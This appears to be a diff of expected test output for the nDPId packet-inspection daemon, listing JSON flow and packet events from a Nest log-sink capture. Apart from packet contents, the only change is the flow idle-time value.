+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1536713052295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536713052295,"pkt":"AJD7JidrGLQwJjRACABFAAAoL2MAAP8GYxnAqPIPI65S7fdsK1cIqL8\/xIBhhVAQD+Vl6gAAAAAAAAAA"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":51,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1536713593921} 
-00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1536712992228,"flow_last_seen":1536713593982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536713593982,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":101,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1536714195599} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536714602587,"pkt":"AJD7JidrGLQwJjRACABFAABEL4kAAP8RJr3AqPIPwKjyAc5xADUAMKk+CwgBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1536714602587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536714602587,"pkt":"GLQwJjRAAJD7JidrCABFAABUsrpAAEARInzAqPIBwKjyDwA1znEAQGW0CwiBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1536714607328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536714607328,"pkt":"AJD7JidrGLQwJjRACABFAABXL7IAAP8RJoHAqPIPwKjyAc5xADUAQyQGbMYBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 